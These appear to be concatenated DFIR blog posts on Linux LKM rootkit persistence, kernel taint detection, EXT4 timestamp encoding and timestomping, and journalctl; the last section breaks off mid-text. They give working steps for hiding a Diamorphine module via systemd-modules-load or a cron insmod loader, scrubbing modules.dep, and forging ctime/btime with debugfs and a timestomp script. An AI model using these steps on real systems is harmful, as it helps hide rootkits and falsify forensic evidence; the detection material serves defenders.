A Little More on LKM Persistence

In my previous blog post I demonstrated a method for persisting a Linux LKM rootkit across reboots by leveraging systemd-modules-load. For this method to work, we needed to add the evil module into the /usr/lib/modules/$(uname -r) directory and then run depmod. As I pointed out in the article, while the LKM could hide the module object itself, the modprobe command invoked by systemd-modules-load requires the module name to be listed in the modules.dep and modules.dep.bin files created by depmod.

But a few days later it occurred to me that the module name actually only has to appear in the modules.dep.bin file in order to be loaded. modules.dep is an intermediate file that modules.dep.bin is built from. The modprobe command invoked by systemd-modules-load only looks at the (trie structured) modules.dep.bin file. So once modules.dep.bin is created, the attacker could go back and remove their evil module name from modules.dep.
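
A one-line sed is all that cleanup takes (the module name here matches the Diamorphine example from the previous post):

# sed -i '/zaq123edcx-diamorphine/d' /usr/lib/modules/$(uname -r)/modules.dep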

I tested this on my lab system, installing the LKM per my previous blog post and then editing the evil module name out of modules.dep. After a reboot, I verified that the evil module was loaded by looking for the files that are hidden by the rootkit:

# ls /usr/lib/modules-load.d/
fwupd-msr.conf open-vm-tools-desktop.conf
# ls /usr/lib/modules/$(uname -r)/kernel/drivers/block
aoe drbd loop.ko nbd.ko pktcdvd.ko rsxx sx8.ko virtio_blk.ko xen-blkfront.ko
brd.ko floppy.ko mtip32xx null_blk.ko rbd.ko skd.ko umem.ko xen-blkback zram

If the rootkit were not operating, we’d see a zaq123edcx* file in each of these directories.

I thought about writing some code to unpack the format of modules.dep.bin. This format is well documented in the comments of the source code for depmod.c. But then I realized that there was a much easier way to find the evil module name hiding in modules.dep.bin.

depmod works by walking the directory structure under /usr/lib/modules/$(uname -r) and creating modules.dep based on what it finds there. If we run depmod while the LKM is active, then depmod will not see the evil kernel object and will build a new modules.dep and modules.dep.bin file without the LKM object listed:

# cd /usr/lib/modules/$(uname -r)
# cp modules.dep modules.dep.orig
# cp modules.dep.bin modules.dep.bin.orig
# depmod
# diff modules.dep modules.dep.orig
# diff modules.dep.bin modules.dep.bin.orig
Binary files modules.dep.bin and modules.dep.bin.orig differ

The old and new modules.dep files are the same, since I had previously removed the evil module name by hand. But the two modules.dep.bin files differ because the evil module name is still lurking in modules.dep.bin.orig.

And I don’t need to write code to dump the contents of modules.dep.bin.orig— I’ll just use strings and diff:

# diff <(strings -a modules.dep.bin.orig) <(strings -a modules.dep.bin)
1c1
< ?=4_cs
---
> 4_cs
5610,5611d5609
< 123edcx_diamorphine
< <kernel/drivers/block/zaq123edcx-diamorphine.ko:
5616c5614
< 4ndemod
---
> demod
5619c5617
< enhua
---
> 5jenhua
5622a5621
> 7@53
5627d5625
< 8Z2c
5630c5628
< a2326
---
> 9Ja2326
5635c5633
< alloc
---
> <valloc

The output would be prettier with some custom tooling, but you can clearly see the name of the hidden object in the diff output.

From an investigative perspective, I really wish depmod had an option to write modules.dep.bin to an alternate directory. That would make it easier to perform these steps without modifying the state of the system under investigation. I suppose we could use overlayfs hacks to make this happen.

But honestly using modprobe to load your LKM rootkit is probably not the best approach. insmod allows you to specify the path to your evil module. Create a script that uses insmod to load the rootkit, and then drop the script into /etc/cron.hourly with a file name that will be hidden once the rootkit is loaded. Easy!
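
As a hypothetical sketch (the module path below is an assumption, since insmod will load the object from any location regardless of what modules.dep says):

#!/bin/sh
# /etc/cron.hourly/zaq123edcx-loader -- name chosen so the rootkit hides it
# insmod takes an explicit path, so no depmod entry is ever created
/sbin/insmod /usr/lib/zaq123edcx-modules/diamorphine.ko 2>/dev/null

Make the script executable and skip the file extension, since run-parts on many distributions ignores cron.hourly entries whose names contain a dot.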

Linux LKM Persistence

Back in August, Ruben Groenewoud posted two detailed articles on Linux persistence mechanisms and then followed that up with a testing/simulation tool called PANIX that implements many of these persistence mechanisms. Ruben’s work was, in turn, influenced by a series of articles by Pepe Berba and work by Eder Ignacio. Eder’s February article on persistence with udev rules seems particularly prescient after Stroz/AON reported in August on a long-running campaign using udev rules for persistence. I highly recommend all of this work, and frankly I’m including these links so I personally have an easy place to go find them whenever I need them.

In general, all of this work focuses on using persistence mechanisms for running programs in user space. For example, PANIX sets up a simple reverse shell by default (though the actual payload can be customized) and the “sedexp” campaign described by Stroz/AON used udev rules to trigger a custom malware executable.

Reading all of this material got my evil mind working, and got me thinking about how I might handle persistence if I was working with a Linux loadable kernel module (LKM) type rootkit. Certainly I could use any of the user space persistence mechanisms in PANIX that run with root privilege (or at least have CAP_SYS_MODULE capability) to call modprobe or insmod to load my evil kernel module. But what about other Linux mechanisms for specifically loading kernel modules at boot time?

Hiks Gerganov has written a useful article summarizing how to load Linux modules at boot time. If you want to be traditional, you can always put the name of the module you want to load into /etc/modules. But that seems a little too obvious, so instead we are going to use the more flexible systemd-modules-load service to get our evil kernel module installed.

systemd-modules-load looks in multiple directories for configuration files specifying modules to load, including /etc/modules-load.d, /usr/lib/modules-load.d, and /usr/local/lib/modules-load.d. systemd-modules-load also looks in /run/modules-load.d, but /run is typically a tmpfs style file system that does not persist across reboots. Configuration file names must end with “.conf” and simply contain the names of the modules to load, one name per line.

For my examples, I’m going to use the Diamorphine LKM rootkit. Diamorphine started out as a proof of concept rootkit, but a Diamorphine variant has recently been found in the wild. Diamorphine allows you to choose a “magic string” at compile time– any file or directory name that starts with the magic string will automatically be hidden by the rootkit once the rootkit is loaded into the kernel. In my examples I am using the magic string “zaq123edcx“.

First we need to copy the Diamorphine kernel module, typically compiled as diamorphine.ko, into a directory under /usr/lib/modules where it can be found by the modprobe command invoked by systemd-modules-load:

# cp diamorphine.ko /usr/lib/modules/$(uname -r)/kernel/drivers/block/zaq123edcx-diamorphine.ko
# depmod

Note that the directory under /usr/lib/modules is kernel version specific. You can put your evil module anywhere under /usr/lib/modules/*/kernel that you like. Notice that by using the magic string in the file name, we are relying on the rootkit itself to hide the module. Of course, if the victim machine receives a kernel update then your Diamorphine module in the older kernel directory will no longer be loaded and your evil plots could end up being exposed.

The depmod step is necessary to update the /usr/lib/modules/*/modules.dep and /usr/lib/modules/*/modules.dep.bin files. Until these files are updated, modprobe will be unable to locate your kernel module. Unfortunately, depmod puts the path name of your evil module into both of the modules.dep* files. So you will probably want to choose a less obvious name (and magic string) than the one I am using here.
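
For reference, the line depmod adds to modules.dep for our example is just the module path followed by a colon (Diamorphine depends on no other modules, so nothing follows the colon):

kernel/drivers/block/zaq123edcx-diamorphine.ko: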

The only other step needed is to create a configuration file for systemd-modules-load:

# echo zaq123edcx-diamorphine >/usr/lib/modules-load.d/zaq123edcx-evil.conf

The configuration file is just a single line– whatever name you copied the evil module to under /usr/lib/modules, but without the “.ko” extension. Here again we name the configuration file with the Diamorphine magic string so the file will be hidden once the rootkit is loaded.

That’s all the configuration you need to do. Load the rootkit manually by running “modprobe zaq123edcx-diamorphine” and rest easy in the knowledge that the rootkit will load automatically whenever the system reboots.

Finding the Evil

What artifacts are created by these changes? The mtime on the /usr/lib/modules-load.d directory and the directory where you installed the rootkit module will be updated. Aside from putting the name of your evil module into the modules.dep* files, the depmod command updates the mtime on several other files under /usr/lib/modules/*:

/usr/lib/modules/.../modules.alias
/usr/lib/modules/.../modules.alias.bin
/usr/lib/modules/.../modules.builtin.alias.bin
/usr/lib/modules/.../modules.builtin.bin
/usr/lib/modules/.../modules.dep
/usr/lib/modules/.../modules.dep.bin
/usr/lib/modules/.../modules.devname
/usr/lib/modules/.../modules.softdep
/usr/lib/modules/.../modules.symbols
/usr/lib/modules/.../modules.symbols.bin

Timestomping these files and directories could make things more difficult for hunters.
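
A crude sketch of that timestomping, assuming modules.order (which depmod does not rewrite) still carries the original package timestamps, and remembering that touch only resets atime and mtime, never ctime:

cd /usr/lib/modules/$(uname -r)
for f in modules.alias modules.alias.bin modules.builtin.alias.bin \
         modules.builtin.bin modules.dep modules.dep.bin modules.devname \
         modules.softdep modules.symbols modules.symbols.bin; do
    touch -r modules.order "$f"    # copy atime/mtime from the untouched reference file
done
# The two directories whose mtimes changed, using untouched neighbors as references
touch -r kernel/drivers/char kernel/drivers/block
touch -r /usr/lib/modules-load.d/fwupd-msr.conf /usr/lib/modules-load.d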

But loading the rootkit is also likely to “taint” the kernel. You can try looking at the dmesg output for taint warnings:

# dmesg | grep taint
[ 8.390098] diamorphine: loading out-of-tree module taints kernel.
[ 8.390112] diamorphine: module verification failed: signature and/or required key missing - tainting kernel

However, these log messages can be removed by the attacker or simply disappear due to the system’s normal log rotation (if the machine has been running long enough). So you should also look at /proc/sys/kernel/tainted:

# cat /proc/sys/kernel/tainted
12288

Any non-zero value means that the kernel is tainted. To interpret the value, here is a trick based on an idea in the kernel.org document I referenced above:

# taintval=$(cat /proc/sys/kernel/tainted)
# for i in {0..18}; do [[ $(($taintval>>$i & 1)) -eq 1 ]] && echo $i; done
12
13

Referring to the kernel.org document, bit 12 being set means an “out of tree” (externally built) module was loaded. Bit 13 means the module was unsigned. Notice that these flags correspond to the log messages found in the dmesg output above.

While this is a useful bit of command-line kung fu, I thought it would be handy to have in a more portable format and with more verbose output. So I present to you chktaint.sh:

$ chktaint.sh
externally-built (“out-of-tree”) module was loaded
unsigned module was loaded

By default chktaint.sh reads the value from /proc/sys/kernel/tainted on the live system. But in many cases you may be looking at captured evidence offline. So chktaint.sh also allows you to specify an alternate file path (“chktaint.sh /path/to/evidence/file“) or simply a raw numeric value from /proc/sys/kernel/tainted (“chktaint.sh 12288“).
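
For reference, here is a minimal sketch of the same idea in portable shell. This is not the actual chktaint.sh, and only the two taint bits from our example get verbose descriptions:

#!/bin/sh
# Minimal taint decoder sketch -- not the real chktaint.sh
# Accepts nothing (live system), a path to a saved copy, or a raw number
case "$1" in
    "")        taintval=$(cat /proc/sys/kernel/tainted) ;;
    *[!0-9]*)  taintval=$(cat "$1") ;;     # argument looks like a file path
    *)         taintval=$1 ;;              # argument is a raw numeric value
esac

i=0
while [ $i -le 18 ]; do
    if [ $(( (taintval >> i) & 1 )) -eq 1 ]; then
        case $i in
            12) echo 'externally-built ("out-of-tree") module was loaded' ;;
            13) echo 'unsigned module was loaded' ;;
             *) echo "taint bit $i is set (see the kernel taint flag list)" ;;
        esac
    fi
    i=$(( i + 1 ))
done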

The persistence mechanism(s) deployed by the attacker are often the best way to detect whether or not a system is compromised. If the attacker is using an LKM rootkit, checking /proc/sys/kernel/tainted is often a good first step in determining if you have a problem. This can be combined with tools like chkproc (find hidden processes) and chkdirs (find hidden directories) from the chkrootkit project.

More on EXT4 Timestamps and Timestomping

Many years ago I did a breakdown of the EXT4 file system. I devoted an entire blog article to the new timestamp system used by EXT4. The trick is that EXT4 added 32-bit nanosecond resolution fractional seconds fields in its extended inode. But you only need 30 bits to represent nanoseconds, so EXT4 uses the lower two bits of the fractional seconds fields to extend the standard Unix “epoch time” timestamps. This allows EXT4 to get past the Y2K-like problem that normal 32-bit epoch timestamps face in the year 2038.

At the time I wrote, “With the extra two bits, the largest value that can be represented is 0x03FFFFFFFF, which is 17179869183 decimal. This yields a GMT date of 2514-05-30 01:53:03…” But it turns out that I misunderstood something critical about the way EXT4 handles timestamps. The actual largest date that can be represented in an EXT4 file system is 2446-05-10 22:38:55. Curious about why? Read on for a breakdown of how EXT4 timestamps are encoded, or skip ahead to “Practical Applications” to understand why this knowledge is useful.

Traditional Unix File System Timestamps

Traditionally, file system times in Unix/Linux are represented as “the number of seconds since 00:00:00 Jan 1, 1970 UTC”– typically referred to as Unix epoch time. But what if you wanted to represent times before 1970? You just use negative seconds to go backwards.

So Unix file system times are represented as signed 32-bit integers. This gives you a time range from 1901-12-13 20:45:52 (-2**31 or 0x80000000 or -2147483648 seconds) to 2038-01-19 03:14:07 (2**31 - 1 or 0x7fffffff or 2147483647 seconds). When January 19th, 2038 rolls around, unpatched 32-bit Unix and Linux systems are going to be having a very bad day. Don’t try to tell me there won’t be critical applications running on these systems in 2038– I’m pretty much basing my retirement planning on consulting in this area.

What Did EXT4 Do?

EXT4 had those two extra bits from the fractional seconds fields to play around with, so the developers used them to extend the seconds portion of the timestamp. When I wrote my infamous “timestamps good into year 2514” comment in the original article, I was thinking of the timestamp as an unsigned 34-bit integer 0x03ffffffff. But that’s not right.

EXT4 still has to support the original timestamp range from 1901 – 2038 and the epoch still has to be based around January 1, 1970 or else chaos will ensue. So the meaning of the original epoch time values hasn’t changed. This field still counts seconds from -2147483648 to 2147483647.

So what about the extra two bits? With two bits you can enumerate values from 0-3. EXT4 treats these as multiples of 2**32 or 4294967296 seconds. So, for example, if the “extra” bits value were 2 you would start with 2 * 4294967296 = 8589934592 seconds and then add whatever value is in the standard epoch seconds field. And if that epoch seconds value was negative, you end up adding a negative number, which is how mathematicians think of subtraction.

This insanity allows EXT4 to cover a range from (0 * 4294967296 - 2147483648) aka -2147483648 seconds (the traditional 1901 time value) all the way up to (3 * 4294967296 + 2147483647) = 15032385535 seconds. That timestamp is 2446-05-10 22:38:55, the maximum EXT4 timestamp. If you’re still around in the year 2446 (and people are still using money) then maybe you can pick up some extra consulting dollars fixing legacy systems.
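
Here is a quick sanity check of that upper limit using GNU date and a little shell arithmetic (the -u forces UTC output):

$ date -u -d @$(( 3 * 4294967296 + 2147483647 )) '+%F %T'
2446-05-10 22:38:55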

At this point you may be wondering why the developers chose this encoding. Why not just use the extra bits to make a 34-bit signed integer? A 34-bit signed integer would have a range from -2**33 = -8589934592 seconds to 2**33 - 1 = 8589934591 seconds. That would give you a range of timestamps from 1697-10-17 11:03:28 to 2242-03-16 12:56:31. Being able to set file timestamps back to 1697 is useful to pretty much nobody. Whereas the system the EXT4 developers chose gives another 200 years of future dates over the basic signed 34-bit date scheme.

Practical Applications

Why am I looking so closely at EXT4 timestamps? This whole business started out because I was frustrated after reading yet another person claiming (incorrectly) that you cannot set ctime and btime in Linux file systems. Yes, the touch command only lets you set atime and mtime, but touch is not the only game in town.

For EXT file systems, the debugfs command allows writing to inode fields directly with the set_inode_field command (abbreviated sif). This works even on actively mounted file systems:

root@LAB:~# touch MYFILE
root@LAB:~# ls -i MYFILE
654442 MYFILE
root@LAB:~# df -h .
Filesystem              Size  Used Avail Use% Mounted on
/dev/mapper/LabVM-root   28G   17G  9.7G  63% /
root@LAB:~# debugfs -w -R 'stat <654442>' /dev/mapper/LabVM-root | grep time:
 ctime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 atime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 mtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
crtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
root@LAB:~# debugfs -w -R 'sif <654442> crtime @-86400' /dev/mapper/LabVM-root
root@LAB:~# debugfs -w -R 'stat <654442>' /dev/mapper/LabVM-root | grep time:
 ctime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 atime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 mtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
crtime: 0xfffeae80:8eb89330 -- Tue Dec 30 19:00:00 1969

The set_inode_field command needs the inode number, the name of the field you want to set (you can get a list of field names with set_inode_field -l), and the value you want to set the field to. In the example above, I’m setting the crtime field (which is how debugfs refers to btime). debugfs wants you to provide the value as an epoch time value– either in hex starting with “0x” or in decimal preceded by “@“.

What often trips people up when they try this is caching. Watch what happens when I use the standard Linux stat command to dump the file timestamps:

root@LAB:~# stat MYFILE
  File: MYFILE
  Size: 0               Blocks: 0          IO Block: 4096   regular empty file
Device: fe00h/65024d    Inode: 654442      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-09-02 09:58:13.598615244 -0400
Modify: 2024-09-02 09:58:13.598615244 -0400
Change: 2024-09-02 09:58:13.598615244 -0400
 Birth: 2024-09-02 09:58:13.598615244 -0400

The btime appears to be unchanged! The on-disk inode has changed, but the operating system hasn’t caught up to the new reality yet. Once I force Linux to drop its out-of-date cached info, everything looks as it should:

root@LAB:~# echo 3 > /proc/sys/vm/drop_caches
root@LAB:~# stat MYFILE
  File: MYFILE
  Size: 0               Blocks: 0          IO Block: 4096   regular empty file
Device: fe00h/65024d    Inode: 654442      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-09-02 09:58:13.598615244 -0400
Modify: 2024-09-02 09:58:13.598615244 -0400
Change: 2024-09-02 09:58:13.598615244 -0400
 Birth: 1969-12-30 19:00:00.598615244 -0500

If I wanted to set the fractional seconds field, that would be crtime_extra. Remember, however, that the low bits of this field are used to set dates far into the future:

root@LAB:~# debugfs -w -R 'sif <654442> crtime_extra 2' /dev/mapper/LabVM-root
root@LAB:~# debugfs -w -R 'stat <654442>' /dev/mapper/LabVM-root | grep time:
debugfs 1.46.2 (28-Feb-2021)
 ctime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 atime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
 mtime: 0x66d5c475:8eb89330 -- Mon Sep  2 09:58:13 2024
crtime: 0xfffeae80:00000002 -- Tue Mar 15 08:56:32 2242

For the *_extra fields, debugfs just wants a raw number either in hex or decimal (hex values should still start with “0x“).

Making This Easier

Human beings would like to use readable timestamps rather than epoch time values. The good news is that GNU date can convert a variety of different timestamp formats into epoch time values:

root@LAB:~# date -d '2345-01-01 12:34:56' '+%s'
11833925696

Specify whatever time string you want to convert after the -d option. The %s format means give epoch time output.

Now for the bad news. The value that date outputs must be converted into the peculiar encoding that EXT4 uses. And that’s why I spent so much time fully understanding the EXT4 timestamp format. That understanding leads to some crazy shell math:

# Calculate a random nanoseconds value
# Mask it down to only 30 bits, shift left two bits
nanosec="0x$(head /dev/urandom | tr -d -c 0-9a-f | cut -c1-8)"
nanosec=$(( ($nanosec & 0x3fffffff) << 2 ))

# Get an epoch time value from the date command
# Adjust the time value to a range of all positive values
# Calculate the number for the standard seconds field
# Calculate the bits needed in the *_extra field
epoch_time=$(date -d '2345-01-01 12:34:56' '+%s')
adjusted_time=$(( $epoch_time + 2147483648 ))
time_lowbits=$(( ($adjusted_time % 4294967296) - 2147483648 ))
time_highbits=$(( $adjusted_time / 4294967296 ))

# The *_extra field value combines extra bits with nanoseconds
extra_field=$(( $nanosec + $time_highbits ))
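
To close the loop, those computed values can then be handed to debugfs roughly like this (the inode number and device are just the ones from the MYFILE example above):

# Write the two pieces into the example inode, then flush the cache
debugfs -w -R "sif <654442> crtime @${time_lowbits}" /dev/mapper/LabVM-root
debugfs -w -R "sif <654442> crtime_extra ${extra_field}" /dev/mapper/LabVM-root
echo 3 > /proc/sys/vm/drop_caches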

Clearly nobody wants to do this manually every time. You just want to do some timestomping, right? Don’t worry, I’ve written a script to set timestamps in EXT:

root@LAB:~# extstomp -v -macb -T '2123-04-05 1:23:45' MYFILE
===== MYFILE
 ctime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
 atime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
 mtime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
crtime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
root@LAB:~# extstomp -v -cb -T '2345-04-05 2:34:56' MYFILE
===== MYFILE
 ctime: 0xc1d6b290:61966bab -- Thu Apr  5 02:34:56 2345
 atime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
 mtime: 0x2044c7e1:ec154f7d -- Mon Apr  5 01:23:45 2123
crtime: 0xc1d6b290:61966bab -- Thu Apr  5 02:34:56 2345

Use the -macb options to specify the timestamps you want to set and -T to specify your time string. You can use -e to specify nanoseconds if you want, otherwise the script just generates a random nanoseconds value. The script is usually silent but -v causes the script to output the file timestamps when it’s done. The script even drops the file system caches automatically for you (unless you use -C to keep the old cached info).

And because you often want to blend in with other files in the operating system, I’ve included an option to copy the timestamps from another file:

root@LAB:~# extstomp -v -macb -S /etc/passwd MYFILE
===== MYFILE
 ctime: 0x66b37fc9:9d8e0ba8 -- Wed Aug  7 10:08:09 2024
 atime: 0x66d5c3cb:33dd3b30 -- Mon Sep  2 09:55:23 2024
 mtime: 0x66b37fc9:9d8e0ba8 -- Wed Aug  7 10:08:09 2024
crtime: 0x66b37fc9:9d8e0ba8 -- Wed Aug  7 10:08:09 2024
root@LAB:~# stat /etc/passwd
  File: /etc/passwd
  Size: 2356            Blocks: 8          IO Block: 4096   regular file
Device: fe00h/65024d    Inode: 1368805     Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-09-02 09:55:23.217534156 -0400
Modify: 2024-08-07 10:08:09.660833002 -0400
Change: 2024-08-07 10:08:09.660833002 -0400
 Birth: 2024-08-07 10:08:09.660833002 -0400

You’re welcome!

What About Other File Systems?

It’s particularly easy to do this timestomping on EXT because debugfs allows us to operate on live file systems. In “expert mode” (xfs_db -x), the xfs_db tool has a write command that allows you to set inode fields. Unfortunately, by default xfs_db does not allow writing to mounted file systems. Of course, an enterprising individual could modify the xfs_db source code and bypass these safety checks.

And that’s really the bottom line. Use the debugging tool for whatever file system you are dealing with to set the timestamp values appropriately for that file system. It may be necessary to modify the code to allow operation on live file systems, but tweaking timestamp fields in an inode while the file system is running is generally not too dangerous.

Systemd Journal and journalctl

While I haven’t been happy about Systemd’s continued encroachment into the Linux operating system, I will say that the Systemd journal is generally an upgrade over traditional Syslog. We’ve reached the point where some newer distributions are starting to forgo Syslog and traditional Syslog-style logs altogether. The challenge for DFIR professionals is that the Systemd journals are in a binary format and require a command-line tool, journalctl, for searching and text output.

The main advantage that Systemd journals have over traditional Syslog-style logs is that Systemd journals carry considerably more metadata related to log messages, and this metadata is broken down into multiple searchable fields. A traditional Syslog log message might look like:

Jul 21 11:22:02 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2

The Systemd journal entry for the same message is:

{
        "_EXE" : "/usr/sbin/sshd",
        "_SYSTEMD_CGROUP" : "/system.slice/ssh.service",
        "_SELINUX_CONTEXT" : "unconfined\n",
        "SYSLOG_FACILITY" : "4",
        "_SYSTEMD_UNIT" : "ssh.service",
        "_UID" : "0",
        "SYSLOG_TIMESTAMP" : "Jul 21 07:22:02 ",
        "_CAP_EFFECTIVE" : "1ffffffffff",
        "_TRANSPORT" : "syslog",
        "_SYSTEMD_SLICE" : "system.slice",
        "PRIORITY" : "6",
        "SYSLOG_IDENTIFIER" : "sshd",
        "_PID" : "1304",
        "_HOSTNAME" : "LAB",
        "__REALTIME_TIMESTAMP" : "1721560922218814",
        "_SYSTEMD_INVOCATION_ID" : "70a0b99512864d22a8f8b10752ad6537",
        "SYSLOG_PID" : "1304",
        "__MONOTONIC_TIMESTAMP" : "265429588",
        "_GID" : "0",
        "__CURSOR" : "s=743db8433dcc46ca9b9cecd7a4272061;i=1d6f;b=5c57e83c3abd457c95d0695807667c9e;m=fd22254;t=61dc0233a613e;x=31ff9c313be9c36f",
        "_CMDLINE" : "sshd: lab [priv]",
        "_MACHINE_ID" : "47b59f088dc74eb0b8544be4c3276463",
        "_COMM" : "sshd",
        "_BOOT_ID" : "5c57e83c3abd457c95d0695807667c9e",
        "MESSAGE" : "Accepted password for lab from 192.168.10.1 port 56280 ssh2",
        "_SOURCE_REALTIME_TIMESTAMP" : "1721560922218786"
}

Any of these fields is individually searchable. The journalctl command provides multiple pre-defined output formats, and custom output of specific fields is also supported.

Systemd uses a simple serialized text protocol over HTTP or HTTPS for sending journal entries to remote log collectors. This protocol uses port 19532 by default. The URL of the remote server is normally found in the /etc/systemd/journal-upload.conf file. On the receiver, configuration for handling the incoming messages is defined in /etc/systemd/journal-remote.conf. A “pull” mode for requesting journal entries from remote systems is also supported, using port 19531 by default.
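
For reference, the client side configuration is just a URL under the [Upload] section (the host name below is made up):

# /etc/systemd/journal-upload.conf (illustrative values only)
[Upload]
URL=https://logcollector.example.com:19532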

Journal Time Formats

As you can see in the JSON output above, the Systemd journal supports multiple time formats. The primary format is a Unix epoch style UTC time with an extra six digits for microsecond precision. This is the format for the _SOURCE_REALTIME_TIMESTAMP and __REALTIME_TIMESTAMP fields. Archived journal file names (see below) use a hexadecimal form of this UTC time value.

Note that _SOURCE_REALTIME_TIMESTAMP is the time when systemd-journald first received the message on the system where the message was originally generated. If the message was later relayed to another system using the systemd-journal-remote service, __REALTIME_TIMESTAMP will reflect the time the message was received by the remote system. In the journal on the originating system, _SOURCE_REALTIME_TIMESTAMP and __REALTIME_TIMESTAMP are usually the same value.

I have created shell functions for converting both the decimal and hexadecimal representations of this time format into human-readable time strings:

function jtime { usec=$(echo $1 | cut -c11-); date -d @$(echo $1 | cut -c 1-10) "+%F %T.$usec %z"; }
function jhextime { usec=$(echo $((0x$1)) | cut -c11-); date -d @$(echo $((0x$1)) | cut -c 1-10) "+%F %T.$usec %z"; }
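
For example, feeding in the __REALTIME_TIMESTAMP from the JSON output above, first in decimal and then in its hexadecimal form (output appears in the local time zone, US Eastern on my lab system):

$ jtime 1721560922218814
2024-07-21 07:22:02.218814 -0400
$ jhextime 61dc0233a613e
2024-07-21 07:22:02.218814 -0400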

Journal entries also contain a __MONOTONIC_TIMESTAMP field. This field represents the number of microseconds since the system booted. This is the same timestamp typically seen in dmesg output.

Journal entries will usually contain a SYSLOG_TIMESTAMP field. This text field is the traditional Syslog-style timestamp format. This time is in the default local time zone for the originating machine.

Journal Files Location and Naming

Systemd journal files are typically found under /var/log/journal/MACHINE_ID. The MACHINE_ID is a random 128-bit value assigned to each system during the first boot. You can find the MACHINE_ID in the /etc/machine-id file.

Under the /var/log/journal/MACHINE_ID directory, you will typically find multiple files:

root@LAB:~# ls /var/log/journal/47b59f088dc74eb0b8544be4c3276463/
system@00061db4ac78a3a2-03652b1534b78cc1.journal~
system@7166038d7a284f0f9f3c1aa7fab3f251-0000000000000001-0005f3e6144d8b0c.journal
system@7166038d7a284f0f9f3c1aa7fab3f251-0000000000001d59-0005f848158ef146.journal
system@7166038d7a284f0f9f3c1aa7fab3f251-00000000000061be-0005fbf9b35341f9.journal
system.journal
user-1000@00061db4b9047993-8eabd101686c1832.journal~
user-1000@a9d71fa481e0447a88f62416b6815868-0000000000001d7c-0005f8481f464fe7.journal
user-1000@c946abc41d224a5692053aa4e03ae012-00000000000007fe-0005f3e61585d7c2.journal
user-1000@e933964a572642cdb863a8803485cf10-0000000000006411-0005fbf9b50e0a5a.journal
user-1000.journal

The system.journal file is where logs from operating system services are currently being written. The other system@*.journal files are older, archived journal files. The systemd-journald process takes care of rotating the current journal and purging older files based on parameters configured in /etc/systemd/journald.conf.

The naming convention for these archived files is system@fileid-seqnum-time.journal. fileid is a random 128-bit file ID number. seqnum is the sequence number of the first message in the journal file. Sequence numbers start at one and simply increase monotonically with each new message. time is the hexadecimal form of the standard journal UTC Unix epoch timestamp (see above). This time matches the __REALTIME_TIMESTAMP value of the first message in the journal– the time that message was received on the local system.

File names that end in a tilde– like the system@00061db4ac78a3a2-03652b1534b78cc1.journal~ file– are files that systemd-journald either detected as corrupted or which were ended by an unclean shutdown of the operating system. The first field after the “@” is a hex timestamp value corresponding to when the file was renamed as an archive. This is often when the system reboots, if the operating system crashed. I have been unable to determine how the second hex string is calculated.

In addition to the system*.journal files, the journal directory may also contain one or more user-UID*.journal files. These are user-specific logs where the UID corresponds to each user’s UID value in the third field of /etc/passwd. The naming convention on the user-UID*.journal files is the same as for the system*.journal files.

The journalctl Command

Because the journalctl command has a large number of options for searching, output formats, and more, I have created a quick one-page cheat sheet for the journalctl command. You may want to refer to the cheat sheet as you read through this section.

My preference is to “export SYSTEMD_PAGER=” before running the journalctl command. Setting this variable to null means that long lines in the journalctl output will wrap onto the next line of your terminal rather than forcing you to scroll right to see the full message. If you want to look at the output one screenful at a time, you can simply pipe the output into less or more.

SELECTING FILES

By default the journalctl command operates on the local journal files in /var/log/journal/MACHINE_ID. If you wish to use a different set of files, you can specify an alternate directory with “-D“, e.g. “journalctl -D /path/to/evidence ...“. You can specify an individual file with “--file=” or use multiple “--file” arguments on a single command line. The “--file” option also accepts normal shell wildcards, so you could use “journalctl --file=system@\*” to operate just on archived system journal files in the current working directory. Note the extra backslash (“\“) to prevent the wildcard from being interpreted by the shell.

“journalctl --header” provides information about the contents of one or more journal files:

# journalctl --header --file=system@00061db4ac78a3a2-03652b1534b78cc1.journal~
File path: system@00061db4ac78a3a2-03652b1534b78cc1.journal~
File ID: a98f5eb8aff543a8abdee01518dd91f0
Machine ID: 47b59f088dc74eb0b8544be4c3276463
Boot ID: 9ac272cac6c040a7b9ad021ba32c2574
Sequential number ID: 7166038d7a284f0f9f3c1aa7fab3f251
State: OFFLINE
Compatible flags:
Incompatible flags: COMPRESSED-LZ4
Header size: 256
Arena size: 33554176
Data hash table size: 211313
Field hash table size: 333
Rotate suggested: no
Head sequential number: 27899 (6cfb)
Tail sequential number: 54724 (d5c4)
Head realtime timestamp: Sun 2024-07-14 16:18:40 EDT (61d3ad1816828)
Tail realtime timestamp: Sat 2024-07-20 08:55:01 EDT (61dad51f51a90)
Tail monotonic timestamp: 2d 1min 22.016s (284092380c)
Objects: 116042
Entry objects: 26326
Data objects: 64813
Data hash table fill: 30.7%
Field objects: 114
Field hash table fill: 34.2%
Tag objects: 0
Entry array objects: 24787
Deepest field hash chain: 2
Deepest data hash chain: 4
Disk usage: 32.0M

The most useful information here is the first (“Head“) and last (“Tail“) timestamps in the file along with the object counts.

OUTPUT MODES

The default output mode for journalctl is very similar to a typical Syslog-style log:

# journalctl -t sudo -r
-- Journal begins at Sat 2023-02-04 15:59:52 EST, ends at Sun 2024-07-21 13:00:01 EDT. --
Jul 21 07:34:01 LAB sudo[1491]: pam_unix(sudo:session): session opened for user root(uid=0) by lab(uid=1000)
Jul 21 07:34:01 LAB sudo[1491]:      lab : TTY=pts/1 ; PWD=/home/lab ; USER=root ; COMMAND=/bin/bash
